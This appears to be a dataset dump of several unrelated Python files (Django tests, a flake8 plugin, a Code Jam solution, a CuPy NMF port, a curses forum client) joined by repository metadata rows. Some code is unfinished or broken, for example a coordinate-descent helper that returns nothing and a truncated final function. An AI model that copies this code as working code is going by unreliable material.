self.assertEqual('testperiod', menuitem.label)
def test_add_period_breadcrumb_item_label_devilryrole_subjectadmin(self):
testperiod = mommy.make('core.Period',
parentnode__short_name='testsubject',
short_name='testperiod')
mock_cradmin_instance = mock.MagicMock()
mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'subjectadmin'
menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
menuitem = menu.add_period_breadcrumb_item(period=testperiod)
self.assertEqual('testperiod', menuitem.label)
def test_add_period_breadcrumb_item_label_devilryrole_periodadmin(self):
testperiod = mommy.make('core.Period',
parentnode__short_name='testsubject',
short_name='testperiod')
mock_cradmin_instance = mock.MagicMock()
mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
menuitem = menu.add_period_breadcrumb_item(period=testperiod)
self.assertEqual('testsubject.testperiod', menuitem.label)
def test_add_assignment_breadcrumb_item_label(self):
testassignment = mommy.make('core.Assignment', short_name='testassignment')
mock_cradmin_instance = mock.MagicMock()
mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'departmentadmin'
menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
menuitem = menu.add_assignment_breadcrumb_item(assignment=testassignment)
self.assertEqual('testassignment', menuitem.label)
| 3,988 | 9 | 238 |
fe1f740fd51bf888fbacf441f65fbe1a286f3389 | 9,577 | py | Python | flake8_prevent_fails/__init__.py | Atterratio/flake8-prevent-fails | 068502a1542d03e60d9d9a9853dfdc1f0883f9cb | [
"MIT"
] | null | null | null | flake8_prevent_fails/__init__.py | Atterratio/flake8-prevent-fails | 068502a1542d03e60d9d9a9853dfdc1f0883f9cb | [
"MIT"
] | null | null | null | flake8_prevent_fails/__init__.py | Atterratio/flake8-prevent-fails | 068502a1542d03e60d9d9a9853dfdc1f0883f9cb | [
"MIT"
] | null | null | null | import ast
__version__ = '0.0.5'
__all__ = ('FailsChecker', )
MESSAGES = {
'PF101': 'PF101 Potential IndexError fail.',
'PF102': 'PF102 Potential KeyError fail. You can replace this with `dict.get(key, failback_value)`',
'PF103': 'PF103 Potential IndexError or KeyError fail.',
}
| 41.280172 | 104 | 0.446695 | import ast
__version__ = '0.0.5'
__all__ = ('FailsChecker', )
MESSAGES = {
'PF101': 'PF101 Potential IndexError fail.',
'PF102': 'PF102 Potential KeyError fail. You can replace this with `dict.get(key, failback_value)`',
'PF103': 'PF103 Potential IndexError or KeyError fail.',
}
class PluginVisitor(ast.NodeVisitor):
def __init__(self):
self.errors = []
def check_exception_catch(self, node, exception_types):
# TODO fix if indexing in try:else: statement
parent = node
while True:
if getattr(parent, 'pf_parent', None):
parent = parent.pf_parent
if isinstance(parent, ast.Try):
for handler in parent.handlers:
if handler.type:
try:
if handler.type.id in exception_types:
# error handled in specific exception
return True
except AttributeError:
if isinstance(handler.type, ast.Tuple):
for handler_type in handler.type.elts:
if handler_type.id in exception_types:
# error handled as one of list of errors
return True
else:
# error handled in non specific exception
return True
else:
# no error handler
return False
def check_safe_if(self, node):
parent = node
while True:
if getattr(parent, 'pf_parent', None):
parent = parent.pf_parent
if isinstance(parent, ast.If):
indexed_obj = node.pf_parent.value.id
if isinstance(parent.test, ast.Call):
# Check safe if for dict like this `if test_dict.get(key, None):`
checked_obj = parent.test.func.value.id
func = parent.test.func.attr
args = parent.test.args
if indexed_obj == checked_obj and func == 'get':
if isinstance(node.pf_parent.slice.value, ast.Str):
# dict key set as string
dict_key = node.pf_parent.slice.value.s
checked_key = args[0].s
if dict_key == checked_key:
return True
elif isinstance(node.pf_parent.slice.value, ast.Name):
# dict key set as variable
dict_key = node.pf_parent.slice.value.id
try:
checked_key = args[0].id
except (IndexError, AttributeError):
pass
else:
if dict_key == checked_key:
return True
elif isinstance(parent.test, ast.Compare):
# Check safe if for dict like this `if index < len(test):`
compare_operator = parent.test.ops[0]
if isinstance(compare_operator, ast.Lt):
try:
func = parent.test.comparators[0].func.id
except (IndexError, AttributeError):
pass
else:
if func == 'len':
if isinstance(node.pf_parent.slice.value, ast.Num):
checked_obj = parent.test.comparators[0].args[0].id
if indexed_obj == checked_obj:
index = node.pf_parent.slice.value.n
compare_index = parent.test.left.n
if index == compare_index:
return True
elif isinstance(node.pf_parent.slice.value, ast.Name):
checked_obj = parent.test.comparators[0].args[0].id
if indexed_obj == checked_obj:
index = node.pf_parent.slice.value.id
compare_index = parent.test.left.id
if index == compare_index:
return True
elif isinstance(compare_operator, ast.Gt):
try:
func = parent.test.left.func.id
except AttributeError:
pass
else:
if func == 'len':
if isinstance(node.pf_parent.slice.value, ast.Num):
checked_obj = parent.test.left.args[0].id
if indexed_obj == checked_obj:
index = node.pf_parent.slice.value.n
compare_index = parent.test.comparators[0].n
if index == compare_index:
return True
elif isinstance(node.pf_parent.slice.value, ast.Name):
checked_obj = parent.test.args[0].id
if indexed_obj == checked_obj:
index = node.pf_parent.slice.value.id
compare_index = parent.test.comparators[0].id
if index == compare_index:
return True
else:
return False
def check_safe_for(self, node):
parent = node
while True:
if getattr(parent, 'pf_parent', None):
parent = parent.pf_parent
if isinstance(parent, ast.For):
indexed_obj = node.pf_parent.value.id
try:
key = node.value.id
except AttributeError:
pass
else:
if isinstance(parent.iter, ast.Name):
iter_obj = parent.iter.id
iter_var = parent.target.id
if indexed_obj == iter_obj and key == iter_var:
return True
else:
return False
def handle_num(self, node):
exception_types = ['IndexError']
error = (
node.value.lineno,
node.value.col_offset,
MESSAGES.get('PF101'),
type(self)
)
error_handled = self.check_exception_catch(node, exception_types)
if not error_handled:
error_handled = self.check_safe_if(node)
if not error_handled:
self.errors.append(error)
def handle_str(self, node):
exception_types = ['KeyError']
error = (
node.value.lineno,
node.value.col_offset,
MESSAGES.get('PF102'),
type(self)
)
error_handled = self.check_exception_catch(node, exception_types)
if not error_handled:
error_handled = self.check_safe_if(node)
if not error_handled:
self.errors.append(error)
def handle_name(self, node):
exception_types = ['IndexError', 'KeyError']
error = (
node.value.lineno,
node.value.col_offset,
MESSAGES.get('PF103'),
type(self)
)
error_handled = self.check_exception_catch(node, exception_types)
if not error_handled:
error_handled = self.check_safe_if(node)
if not error_handled:
error_handled = self.check_safe_for(node)
if not error_handled:
self.errors.append(error)
def visit_Index(self, node):
if isinstance(node.value, ast.Num):
self.handle_num(node)
elif isinstance(node.value, ast.Str):
self.handle_str(node)
elif isinstance(node.value, ast.Name):
self.handle_name(node)
self.generic_visit(node)
def generic_visit(self, node):
super().generic_visit(node)
class FailsChecker(object):
name = 'flake8-prevent-fails'
version = __version__
def __init__(self, tree, filename, tokens):
for statement in ast.walk(tree):
for child in ast.iter_child_nodes(statement):
child.pf_parent = statement
self.tree = tree
self.filename = filename
self.tokens = tokens
def check_tree(self):
visitor = PluginVisitor()
visitor.visit(self.tree)
return visitor.errors
def run(self):
for error in self.check_tree():
yield error
| 8,830 | 163 | 288 |
9bfb7d2af35b5044c0b51f83cbd723b998930299 | 2,764 | py | Python | Cruise Control/Solution.py | YIWEI-CHEN/google_code_jam_practice_session_2018 | a0fd32911e10b69116c2923ab1c9e58e4e02fdde | [
"MIT"
] | null | null | null | Cruise Control/Solution.py | YIWEI-CHEN/google_code_jam_practice_session_2018 | a0fd32911e10b69116c2923ab1c9e58e4e02fdde | [
"MIT"
] | null | null | null | Cruise Control/Solution.py | YIWEI-CHEN/google_code_jam_practice_session_2018 | a0fd32911e10b69116c2923ab1c9e58e4e02fdde | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 1 15:18:09 2018
@author: yiwei
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 1 06:11:18 2018
@author: yiwei
"""
from copy import deepcopy
if __name__ == '__main__':
FROM_STDIN = True
# FROM_STDIN = False
horse_list = []
if FROM_STDIN:
readline = input
else:
name = 'A-large-practice.in'
f = open(name, 'r')
readline = f.readline
t = int(readline())
for i in range(1, t+1):
destination, num_horses = list(map(float, readline().split(' ')))
# Parse horse
horse_list = []
for h in range(int(num_horses)):
location, speed = list(map(float, readline().split(' ')))
horse_list.append(Horse(location, speed))
collapse_time = 0
output = calculate_speed(destination, horse_list, collapse_time)
print("Case #{}: {}".format(i, output))
if not FROM_STDIN:
f.close()
| 30.043478 | 111 | 0.58864 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 1 15:18:09 2018
@author: yiwei
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 1 06:11:18 2018
@author: yiwei
"""
from copy import deepcopy
class Horse(object):
def __init__(self, location, speed):
self.location = location
self.speed = speed
def __str__(self):
return 'Horse(' + ', '.join(['{}={}'.format(k, v) for k, v in self.__dict__.items()]) + ')'
def str_list(l):
return ('[' + '\n '.join(str(e) for e in l) + ']')
def calculate_speed(destination, horse_list, collapse_time):
horse_list.sort(key=lambda h: h.location)
# print(collapse_time, str_list(horse_list))
num_horses = len(horse_list)
if num_horses == 1:
horse = horse_list[0]
t_dest = (destination - horse.location) / horse.speed
total_time = t_dest + collapse_time
return destination / total_time
fastest_horse = max(horse_list, key=lambda h: h.speed)
idx = horse_list.index(fastest_horse)
if idx == num_horses - 1:
horse_list.pop(idx)
else:
next_horse = horse_list[idx + 1]
if next_horse.speed == fastest_horse.speed:
for i in range(num_horses - 1 , idx, -1):
horse_list.pop(i)
else:
t_catch = (next_horse.location - fastest_horse.location) / (fastest_horse.speed - next_horse.speed)
location_catch = next_horse.location + next_horse.speed * t_catch
if location_catch <= destination:
collapse_time += t_catch
horse_list.pop(idx + 1)
for horse in horse_list:
horse.location = horse.location + horse.speed * t_catch
fastest_horse.speed = next_horse.speed
else:
for i in range(num_horses - 1 , idx, -1):
horse_list.pop(i)
return calculate_speed(destination, horse_list, collapse_time)
if __name__ == '__main__':
FROM_STDIN = True
# FROM_STDIN = False
horse_list = []
if FROM_STDIN:
readline = input
else:
name = 'A-large-practice.in'
f = open(name, 'r')
readline = f.readline
t = int(readline())
for i in range(1, t+1):
destination, num_horses = list(map(float, readline().split(' ')))
# Parse horse
horse_list = []
for h in range(int(num_horses)):
location, speed = list(map(float, readline().split(' ')))
horse_list.append(Horse(location, speed))
collapse_time = 0
output = calculate_speed(destination, horse_list, collapse_time)
print("Case #{}: {}".format(i, output))
if not FROM_STDIN:
f.close()
| 1,628 | -1 | 121 |
2625845330bef60b1eb6182c371d9b13032bb229 | 8,576 | py | Python | measurexp/NMF.py | bcl-group/measurexp | 66ab471dad2534ec48d13d0546ee3a4f0eb46a91 | [
"MIT"
] | null | null | null | measurexp/NMF.py | bcl-group/measurexp | 66ab471dad2534ec48d13d0546ee3a4f0eb46a91 | [
"MIT"
] | null | null | null | measurexp/NMF.py | bcl-group/measurexp | 66ab471dad2534ec48d13d0546ee3a4f0eb46a91 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn import decomposition
# NMF
from sklearn._config import config_context
from sklearn.decomposition._nmf \
import _beta_divergence, \
_check_string_param, \
_check_init, \
_initialize_nmf, \
_compute_regularization
from sklearn.utils.validation \
import check_array, \
check_non_negative, \
check_random_state
from scipy import sparse
# from scipy.sparse.base import issparse
# import warnings
import numbers
# from sklearn.decomposition._nmf import _initialize_nmf as init_NMF
import cupy as cp
X = np.array([[1, 1], [2, 1], [3, 1.2], [4, 1], [5, 0.8], [6, 1]])
model = cuNMF(init='nndsvd')
model.fit_transform(X)
# decomposition.NMF()
| 38.285714 | 79 | 0.548158 | import numpy as np
from sklearn import decomposition
# NMF
from sklearn._config import config_context
from sklearn.decomposition._nmf \
import _beta_divergence, \
_check_string_param, \
_check_init, \
_initialize_nmf, \
_compute_regularization
from sklearn.utils.validation \
import check_array, \
check_non_negative, \
check_random_state
from scipy import sparse
# from scipy.sparse.base import issparse
# import warnings
import numbers
# from sklearn.decomposition._nmf import _initialize_nmf as init_NMF
import cupy as cp
def cupy_safe_sparse_dot(a, b, *, dense_output=False):
if a.ndim > 2 or b.ndim > 2:
if sparse.issparse(a):
# sparse is always 2D. Implies b is 3D+
# [i, j] @ [k, ..., l, m, n] -> [i, k, ..., l, n]
b_ = cp.rollaxis(b, -2)
b_2d = b_.reshape((b.shape[-2], -1))
ret = a @ b_2d
ret = ret.reshape(a.shape[0], *b_.shape[1:])
elif sparse.issparse(b):
# sparse is always 2D. Implies a is 3D+
# [k, ..., l, m] @ [i, j] -> [k, ..., l, j]
a_2d = a.reshape(-1, a.shape[-1])
ret = a_2d @ b
ret = ret.reshape(*a.shape[:-1], b.shape[1])
else:
ret = np.dot(a, b)
else:
ret = a @ b
if (sparse.issparse(a) and sparse.issparse(b)
and dense_output and hasattr(ret, "toarray")):
return ret.toarray()
return ret
def _cupy_update_coordinate_descent(X, W, Ht, l1_reg, l2_reg, shuffle,
random_state):
n_components = Ht.shape[1]
HHt = cp.dot(Ht.T, Ht)
XHt = cupy_safe_sparse_dot(X, Ht)
# L2 regularization corresponds to increase of the diagonal of HHt
if l2_reg != 0.:
# adds l2_reg only on the diagonal
HHt.flat[::n_components + 1] += l2_reg
# L1 regularization corresponds to decrease of each element of XHt
if l1_reg != 0.:
XHt -= l1_reg
if shuffle:
permutation = random_state.permutation(n_components)
else:
permutation = np.arange(n_components)
# The following seems to be required on 64-bit Windows w/ Python 3.5.
permutation = np.asarray(permutation, dtype=np.intp)
# return _update_cdnmf_fast(W, HHt, XHt, permutation)
def _cupy_fit_coordinate_descent(X, W, H, tol=1e-4, max_iter=200, l1_reg_W=0,
l1_reg_H=0, l2_reg_W=0, l2_reg_H=0,
update_H=True, verbose=0, shuffle=False,
random_state=None):
Ht = check_array(H.T, order='C')
X = check_array(X, accept_sparse='csr')
rng = check_random_state(random_state)
Ht = cp.asarray(Ht)
W = cp.asarray(W)
X = cp.asarray(X)
for n_iter in range(1, max_iter + 1):
violation = 0.
# Update W
violation += _cupy_update_coordinate_descent(X, W, Ht, l1_reg_W,
l2_reg_W, shuffle, rng)
# Update H
if update_H:
# violation += _update_coordinate_descent(X.T, Ht, W, l1_reg_H,
# l2_reg_H, shuffle, rng)
pass
if n_iter == 1:
violation_init = violation
if violation_init == 0:
break
if verbose:
print("violation:", violation / violation_init)
if violation / violation_init <= tol:
if verbose:
print("Converged at iteration", n_iter + 1)
break
return W, Ht.T, n_iter
def cupy_non_negative_factorization(X, W=None, H=None, n_components=None, *,
init='warn', update_H=True, solver='cd',
beta_loss='frobenius', tol=1e-4,
max_iter=200, alpha=0., l1_ratio=0.,
regularization=None, random_state=None,
verbose=0, shuffle=False):
X = check_array(X, accept_sparse=('csr', 'csc'),
dtype=[np.float64, np.float32])
check_non_negative(X, "NMF (input X)")
beta_loss = _check_string_param(solver, regularization, beta_loss, init)
if X.min() == 0 and beta_loss <= 0:
raise ValueError("When beta_loss <= 0 and X contains zeros, "
"the solver may diverge. Please add small values to "
"X, or use a positive beta_loss.")
n_samples, n_features = X.shape
if n_components is None:
n_components = n_features
if not isinstance(n_components, numbers.Integral) or n_components <= 0:
raise ValueError("Number of components must be a positive integer;"
" got (n_components=%r)" % n_components)
if not isinstance(max_iter, numbers.Integral) or max_iter < 0:
raise ValueError("Maximum number of iterations must be a positive "
"integer; got (max_iter=%r)" % max_iter)
if not isinstance(tol, numbers.Number) or tol < 0:
raise ValueError("Tolerance for stopping criteria must be "
"positive; got (tol=%r)" % tol)
# check W and H, or initialize them
if init == 'custom' and update_H:
_check_init(H, (n_components, n_features), "NMF (input H)")
_check_init(W, (n_samples, n_components), "NMF (input W)")
if H.dtype != X.dtype or W.dtype != X.dtype:
raise TypeError("H and W should have the same dtype as X. Got "
"H.dtype = {} and W.dtype = {}."
.format(H.dtype, W.dtype))
elif not update_H:
_check_init(H, (n_components, n_features), "NMF (input H)")
if H.dtype != X.dtype:
raise TypeError("H should have the same dtype as X. Got H.dtype = "
"{}.".format(H.dtype))
# 'mu' solver should not be initialized by zeros
if solver == 'mu':
avg = np.sqrt(X.mean() / n_components)
W = np.full((n_samples, n_components), avg, dtype=X.dtype)
else:
W = np.zeros((n_samples, n_components), dtype=X.dtype)
else:
W, H = _initialize_nmf(X, n_components, init=init,
random_state=random_state)
l1_reg_W, l1_reg_H, l2_reg_W, l2_reg_H = _compute_regularization(
alpha, l1_ratio, regularization)
if solver == 'cd':
W, H, n_iter = _cupy_fit_coordinate_descent(X, W, H, tol, max_iter,
l1_reg_W, l1_reg_H,
l2_reg_W, l2_reg_H,
update_H=update_H,
verbose=verbose,
shuffle=shuffle,
random_state=random_state)
elif solver == 'mu':
print('未実装 (solver == \'mu\')')
else:
raise ValueError("Invalid solver parameter '%s'." % solver)
if n_iter == max_iter and tol > 0:
# warnings.warn("Maximum number of iterations %d reached."
# "Increase it to"
# " improve convergence." % max_iter, ConvergenceWarning)
pass
return W, H, n_iter
class cuNMF(decomposition.NMF):
def fit_transform(self, X, y=None, W=None, H=None):
X = self._validate_data(X, accept_sparse=('csr', 'csc'),
dtype=[np.float64, np.float32])
with config_context(assume_finite=True):
W, H, n_iter_ = cupy_non_negative_factorization(
X=X, W=W, H=H, n_components=self.n_components, init=self.init,
update_H=True, solver=self.solver, beta_loss=self.beta_loss,
tol=self.tol, max_iter=self.max_iter, alpha=self.alpha,
l1_ratio=self.l1_ratio, regularization=self.regularization,
random_state=self.random_state, verbose=self.verbose,
shuffle=self.shuffle)
self.reconstruction_err_ = _beta_divergence(X, W, H, self.beta_loss,
square_root=True)
self.n_components_ = H.shape[0]
self.components_ = H
self.n_iter_ = n_iter_
return W
# return super().fit_transform(X, y, W, H)
X = np.array([[1, 1], [2, 1], [3, 1.2], [4, 1], [5, 0.8], [6, 1]])
model = cuNMF(init='nndsvd')
model.fit_transform(X)
# decomposition.NMF()
| 7,722 | 10 | 141 |
f9350d3119001689df5632afe7aa85da2f895288 | 221 | py | Python | big_data/bokeh_examples/function_example.py | paulhtremblay/big-data | dfa2aa9877300a57e7a9368af59c07fcc5841b4f | [
"MIT"
] | null | null | null | big_data/bokeh_examples/function_example.py | paulhtremblay/big-data | dfa2aa9877300a57e7a9368af59c07fcc5841b4f | [
"MIT"
] | 7 | 2020-06-05T18:13:25.000Z | 2022-03-11T23:19:48.000Z | big_data/bokeh_examples/function_example.py | paulhtremblay/big-data | dfa2aa9877300a57e7a9368af59c07fcc5841b4f | [
"MIT"
] | 1 | 2020-11-25T18:24:37.000Z | 2020-11-25T18:24:37.000Z | from bokeh.plotting import figure, show
import numpy as np
if __name__ == '__main__':
p = plot_func()
show(p)
| 15.785714 | 40 | 0.59276 | from bokeh.plotting import figure, show
import numpy as np
def plot_func():
x = np.linspace(0,1,100)
print(x)
y = [x * x for x in x]
print(y)
if __name__ == '__main__':
p = plot_func()
show(p)
| 77 | 0 | 23 |
2758200c7b9b4e23118e91e0e479902f4cc9a02c | 68 | py | Python | src/vessel-drift-analysis/vessel_drift_analysis/vessel_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | src/vessel-drift-analysis/vessel_drift_analysis/vessel_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | src/vessel-drift-analysis/vessel_drift_analysis/vessel_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | # Calculations related to estimate probability of a vessel drifting
| 34 | 67 | 0.838235 | # Calculations related to estimate probability of a vessel drifting
| 0 | 0 | 0 |
f678b30434cfbcab5a3a8a898d0a71ec304355f1 | 919 | py | Python | voteModels.py | TheaGao/SklearnModel | fe445cddd4fde9acdc87e7e7b3fbc356d1c586aa | [
"MIT"
] | 1 | 2017-12-22T08:51:43.000Z | 2017-12-22T08:51:43.000Z | voteModels.py | TheaGao/SklearnModel | fe445cddd4fde9acdc87e7e7b3fbc356d1c586aa | [
"MIT"
] | null | null | null | voteModels.py | TheaGao/SklearnModel | fe445cddd4fde9acdc87e7e7b3fbc356d1c586aa | [
"MIT"
] | null | null | null | from sklearn.externals import joblib
from preprocessData import getDataXY, get_accuracy
trainX, trainY, testX, testY, validX, validY = getDataXY()
print type(trainY)
models = ['Models/dt0.58.pkl', 'Models/NB0.59.pkl', 'Models/NC0.57.pkl',
'Models/NNP0.61.pkl', 'Models/sgd0.54.pkl']
all_pre = []
for model in models:
print model
clf = joblib.load(model)
predicY = clf.predict(validX)
all_pre.append(predicY)
print get_accuracy(voteIt(all_pre), testY)
| 20.886364 | 83 | 0.644178 | from sklearn.externals import joblib
from preprocessData import getDataXY, get_accuracy
trainX, trainY, testX, testY, validX, validY = getDataXY()
print type(trainY)
models = ['Models/dt0.58.pkl', 'Models/NB0.59.pkl', 'Models/NC0.57.pkl',
'Models/NNP0.61.pkl', 'Models/sgd0.54.pkl']
all_pre = []
for model in models:
print model
clf = joblib.load(model)
predicY = clf.predict(validX)
all_pre.append(predicY)
def voteIt(allResults):
votRes = []
for item in range(len(allResults[0])):
all_item_same_set = []
for clf_num in range(len(allResults)):
all_item_same_set.append(allResults[clf_num][item])
if all_item_same_set.count('sing') > all_item_same_set.count('nosing'):
votRes.append('sing')
else:
votRes.append('nosing')
return votRes
print get_accuracy(voteIt(all_pre), testY)
| 401 | 0 | 23 |
a1ab82d17d46b556b507ef9ff87a538c36628057 | 327 | py | Python | docs/source/examples/FB2.0/patch_subnets.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 14 | 2018-12-07T18:30:27.000Z | 2022-02-22T09:12:33.000Z | docs/source/examples/FB2.0/patch_subnets.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 28 | 2019-09-17T21:03:52.000Z | 2022-03-29T22:07:35.000Z | docs/source/examples/FB2.0/patch_subnets.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 15 | 2020-06-11T15:50:08.000Z | 2022-03-21T09:27:25.000Z | from pypureclient.flashblade import Subnet
# update a subnet's gateway by name
res = client.patch_subnets(
names=['mysubnet'], subnet=Subnet(gateway='1.2.3.1'))
print(res)
if type(res) == pypureclient.responses.ValidResponse:
print(list(res.items))
# Other valid fields: ids
# See section "Common Fields" for examples
| 29.727273 | 57 | 0.743119 | from pypureclient.flashblade import Subnet
# update a subnet's gateway by name
res = client.patch_subnets(
names=['mysubnet'], subnet=Subnet(gateway='1.2.3.1'))
print(res)
if type(res) == pypureclient.responses.ValidResponse:
print(list(res.items))
# Other valid fields: ids
# See section "Common Fields" for examples
| 0 | 0 | 0 |
06f951e3283966b724d8baaa6c24390241496a9d | 667 | py | Python | dataset-processor2.py | Pawel762/class5-homework | 8e48dcda1ed91b7a5e28bea6db13b2a82182e074 | [
"MIT"
] | null | null | null | dataset-processor2.py | Pawel762/class5-homework | 8e48dcda1ed91b7a5e28bea6db13b2a82182e074 | [
"MIT"
] | null | null | null | dataset-processor2.py | Pawel762/class5-homework | 8e48dcda1ed91b7a5e28bea6db13b2a82182e074 | [
"MIT"
] | null | null | null | import pandas as pd
import matplotlib.pyplot as plt
wine_df = pd.read_csv(filepath_or_buffer='~/class5-homework/wine.data',
sep=',',
header=None)
wine_df.columns = ['Class','Alcohol','Malic_Acid','Ash','Alcalinity_of_Ash','Magnesium',
'Total_Phenols','Flavanoids','Nonflavanoid_Phenols','Proanthocyanins',
'Color_Intensity','Hue','OD280_OD315_of_Diluted_Wines','Proline']
pd.set_option('display.max_columns', None)
#Display dataset in table format
#print(wine_df.to_string())
#Display stats of dataset without the Class column
wine_B = wine_df.drop(['Class'], axis = 1)
print(wine_B.describe())
| 29 | 88 | 0.688156 | import pandas as pd
import matplotlib.pyplot as plt
wine_df = pd.read_csv(filepath_or_buffer='~/class5-homework/wine.data',
sep=',',
header=None)
wine_df.columns = ['Class','Alcohol','Malic_Acid','Ash','Alcalinity_of_Ash','Magnesium',
'Total_Phenols','Flavanoids','Nonflavanoid_Phenols','Proanthocyanins',
'Color_Intensity','Hue','OD280_OD315_of_Diluted_Wines','Proline']
pd.set_option('display.max_columns', None)
#Display dataset in table format
#print(wine_df.to_string())
#Display stats of dataset without the Class column
wine_B = wine_df.drop(['Class'], axis = 1)
print(wine_B.describe())
| 0 | 0 | 0 |
34447222ec8b637e61000a67d97c637fdcfc8fe1 | 12,689 | py | Python | fun.py | heixiaobai/adnmb-cli | da8701bf301e9199ec79a584617cd131a4c08611 | [
"MIT"
] | 1 | 2021-11-11T02:19:41.000Z | 2021-11-11T02:19:41.000Z | fun.py | heixiaobai/adnmb-cli | da8701bf301e9199ec79a584617cd131a4c08611 | [
"MIT"
] | null | null | null | fun.py | heixiaobai/adnmb-cli | da8701bf301e9199ec79a584617cd131a4c08611 | [
"MIT"
] | 1 | 2021-11-11T02:20:49.000Z | 2021-11-11T02:20:49.000Z | import re
import curses
import config
import time
import api
# 自定义的所有函数
# conf: 从config获取来自默认或者用户定义的配置信息
conf = config.config_info
# cont: 在运行过程中保存关于运行状态以及用于控制的信息
cont = config.control_info
# 全局使用,当前所访问版块的全部内容
thread_list = {}
# 全局使用,当前所访问的串的全部内容
post_list = {}
# TODO:注释
cont['browse_now_list'] = 0
# TODO: 需要把自定义版块,目前为直接获取
forum_list = api.get_forum_list('adnmb')
ss = pad_b = pad_i = pad_c = None
def stdscr_pad(stdscr: object, pad_browse: object, pad_info: object, pad_control: object):
"""
传入stdscr和3个pad对象,供所有函数操作
"""
global ss, pad_b, pad_i, pad_c
ss = stdscr
pad_b = pad_browse
pad_i = pad_info
pad_c = pad_control
def pad_browse_print(text: str):
"""
向浏览区pad输出内容
:param text: 文本内容
"""
pad_b.clear()
pad_b.addstr(0, 0, text)
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def pad_info_print(text: str):
"""
向信息提示栏输出内容
:param text: 文本内容,显示长度应不大于终端宽度
"""
pad_i.clear()
pad_i.addstr(0, 0, text)
y = curses.LINES - 2
pad_i.refresh(0, 0, y, 0, y, curses.COLS - 1)
def init_pair_color():
"""
根据配色方案定义的颜色初始化颜色,需要在终端初始化之后再运行
"""
c = config.color_info[0]
for i in c.keys():
curses.init_pair(int(i), c[i][0], c[i][1])
def id_color(admin: str, user_id: str = None, po_id: str = None) -> int:
"""
从配色方案定义id的颜色标识(curses颜色标识通过bit位组合)
:param admin: 是否红名标识符
:param user_id: post的用户id
:param po_id: po主的id
:return: curses的颜色标识符
"""
# TODO: Po id的颜色定义
c0 = config.color_info[0]
c1 = config.color_info[1]
color_code = 0
if admin == '1':
color_code = curses.color_pair(c1["admin_id"]) + c0[str(c1["admin_id"])][2]
if user_id == po_id:
color_code = curses.color_pair(c1["admin_po_id"]) + c0[str(c1["admin_po_id"])][2]
elif user_id == po_id:
color_code = curses.color_pair(c1["po_id"]) + c0[str(c1["po_id"])][2]
return color_code
def show_time(post_time: str) -> str:
"""
把从Api获取到的时间格式转为自定义的格式
:param post_time: 从api的json获取到的原时间
:return: 自定义事件格式
"""
timestamp_int = int(
time.mktime(time.strptime(re.sub(r"\(.*\)", " ", post_time), "%Y-%m-%d %H:%M:%S")))
return time.strftime(conf['time_format'], time.localtime(timestamp_int))
def content_process(text: str) -> str:
"""
简单处理掉一些不必要的内容
<br />, \r
:param text:
:return:
"""
text = re.sub(r"<br />|\r", "", text)
# data = ""
# n = 0
# for i in text:
# if i == "\n":
# n += 1
# if n == config_info['thread_content_line']:
# break
# data += i
return text
def forum_data_process(data: list, page: int):
"""
处理从API获取到的版块串列表,以page为key存储到thread_list中
:param data: 从api获取的json
:param page: 页数
"""
global thread_list
thread_list[str(page)] = []
"""
数据说明:
id: 串号
userid: po的饼干
f_name: 版块名
now: 自定义格式化之后的事件
content: 串内容
rC: 串回复数量
"""
for i in range(len(data)):
d = data[i]
thread_list[str(page)].append(
{
'id': [d['id'], 0],
'userid': [d['userid'], id_color(d['userid'], d['admin'])],
'f_name': ['', 0],
'now': [show_time(d['now']), 0],
'content': [content_process(d['content']), 0],
'rC': [d['replyCount'], 0]
}
)
if 'fid' in data[1].keys():
for i in range(len(data)):
thread_list[str(page)][i]['f_name'] = [forum_list[data[i]['fid']], 0]
def thread_data_process(data: dict, page: int = 1):
"""
处理从API获取到的串回复列表,以page为key存储到post_list中
"""
global post_list
# 存储(串号,饼干等……)时为list,[内容,配色]
c = config.color_info[1]
p = curses.color_pair
post_list[str(page)] = []
# 将串基本信息对应id存储
post_list['po_id'] = data['userid']
post_list['tid'] = data['id']
post_list['fid'] = data['fid']
post_list['rC'] = data['replyCount']
if page == 1:
post_list[str(page)].append({
'id': [data['id'], p(c["post_id"])],
'userid': [data['userid'], id_color(data['admin'], data['userid'], data['userid'])],
'now': [show_time(data['now']), p(c["time"])],
'content': [data['content'], p(c["content"])]
})
data = data['replys']
for i in range(len(data)):
d = data[i]
post_list[str(page)].append(
{
'id': [str(d['id']), p(c["post_id"])],
'userid': [d['userid'], id_color(d['admin'], d['userid'], post_list['po_id'])],
'now': [show_time(d['now']), p(c["time"])],
'content': [d['content'], p(c["content"])]
}
)
def pad_browse_update(v_type: str, page: int):
"""
从全局变量thread_list或post_list更新浏览区
:param v_type: forum, thread
:param page: 页数
"""
pad_b.move(0, 0)
data = None
global thread_list, post_list, cont
if v_type == 'forum':
data = thread_list[str(page)]
elif v_type == 'thread':
data = post_list[str(page)]
pad_b.clear()
for i in range(len(data)):
# 串信息:序号 串号 饼干 回复数 版块名
y = pad_b.getyx()[0]
pi = conf['theme']
d = data[i]
